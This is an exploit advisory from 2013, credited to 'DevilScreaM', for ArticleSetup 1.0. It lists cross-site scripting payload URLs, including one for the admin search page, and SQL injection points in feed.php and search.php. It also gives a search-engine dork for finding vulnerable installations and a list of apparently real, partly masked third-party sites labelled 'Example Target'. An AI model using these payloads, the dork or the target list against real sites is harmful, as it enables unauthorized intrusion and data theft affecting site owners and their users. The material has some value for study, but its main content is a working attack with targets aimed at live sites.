#Exploit Title      : ArticleSetup Multiple Vulnerabilities
#Author         : DevilScreaM
#Date           : 21/09/2013
#Category       : Web Applications
#Vendor         : http://www.articlesetup.com/
#Version        : 1.0
  
#Dork          
intext:Powered By Article Marketing
  
#Vulnerability      : Cross Site Scripting , SQL Injection
#Tested On      : Windows 7, Ubuntu (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
  
  
Cross Site Scripting
  
http://site-target/search.php?s=[XSS]
  
Example
  
http://www.freearticle.com.au/search.php?s=<script>alert('DevilScreaM')</script>
  
  
#XSS at Page Admin
  
http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>
  
  
===================================================================================
  
SQL Injection Vulnerability
  
http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]
  
Example
  
http://www.frX.au/feed.php?cat=100'
http://www.frX.com.au/search.php?s=123'
  
====================================================================================
  
Example Target
  
http://freeaXom.au/feed.php?cat=100'
http://alfitXXX99.net/artikel/feed.php?cat=2'
http://demoXXftaculous.com/ArticleSetup/feed.php?cat=100'
http://oromXXtionary.com/articles/feed.php?cat=1'
http://beinXhoppers.com/article/feed.php?cat=44'
http://acXon.eu/article/feed.php?cat=54'
http://sitevXna.com/feed.php?cat=12'
http://www.artiXshub.in/feed.php?cat=10'